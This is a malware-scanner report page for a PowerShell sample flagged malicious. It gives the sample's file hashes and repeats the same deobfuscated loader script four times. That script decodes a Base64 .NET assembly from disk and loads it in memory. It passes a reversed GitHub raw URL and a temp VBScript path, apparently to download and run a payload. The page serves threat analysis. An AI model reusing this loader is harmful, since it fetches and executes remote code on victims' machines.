Malicious
Malicious

1c1562f348ee5f02bf27cd4de7c9ad52

Share on LinkedIn Add to favorites
Re-Scan
Delete
PowerShell
MD5: 1c1562f348ee5f02bf27cd4de7c9ad52
Size: 1.31 KB
application/x-powershell
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
1c1562f348ee5f02bf27cd4de7c9ad52
Sha1
cd5db6c6bd3df6251b2d3ccea8c09a186391f4dd
Sha256
984ca97d34361cafaac92a5f2617931f3dd38ef71774eb29cf8a795a31ab3b6b
Sha384
53c46d3f895a931177bcb411f68d770d268a77ac4055f173fa4ca9481e5f16a26ed203fb5a90eeb238f1cd82cd3b0367
Sha512
8fbdfeae819fab11e04d51c0a50e138f04c4b38481e8269438b4241e615602b31a3b55065da0ea526d8b9272c8965ef405a1fbeaa1b02fe1aca60b587e923c46
SSDeep
24:Qlv4o4Kzyu52U/tMlBygklBRlB0P8wPMuZJBlBMwA6PFv+F5ThBmJ:A4oPtM7ktApDPwF5TH0
TLSH
8A21F310AAFC8E11BA73DB1987BAE08019767AEDED31CB0CC354C10C06AEA449C56F37
File Structure
1c1562f348ee5f02bf27cd4de7c9ad52
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_3fc4b44fdddb35fc904b4aa619de1cacfe1f73490633e22fd163007fe59b2353.vbs", "____________________________________________-------", "0", "1", "caca")))
Deobfuscated PowerShell

$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] (@({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_3fc4b44fdddb35fc904b4aa619de1cacfe1f73490633e22fd163007fe59b2353.vbs", "____________________________________________-------", "0", "1", "caca") } )))
Deobfuscated PowerShell

$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_3fc4b44fdddb35fc904b4aa619de1cacfe1f73490633e22fd163007fe59b2353.vbs", "____________________________________________-------", "0", "1", "caca") } ))
Deobfuscated PowerShell

$nDxWq = "txt.GG4242/niam/sdaeh/sfer/SODATIVNI/tib-18891zelevoinotna/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\Lwoqo.txt" $FloPf = (Get-Content -Path $x -Encoding "UTF8") $FloPf = $FloPf."replace"("*********************************", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($FloPf) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.LzKWm")."GetMethod"("WmJZZ")."Invoke"($yGpIW, [object[]] @({ @(($nDxWq), "C:\Users\Admin\AppData\Local\Temp\_3fc4b44fdddb35fc904b4aa619de1cacfe1f73490633e22fd163007fe59b2353.vbs", "____________________________________________-------", "0", "1", "caca") } ))
1c1562f348ee5f02bf27cd4de7c9ad52 (1.31 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙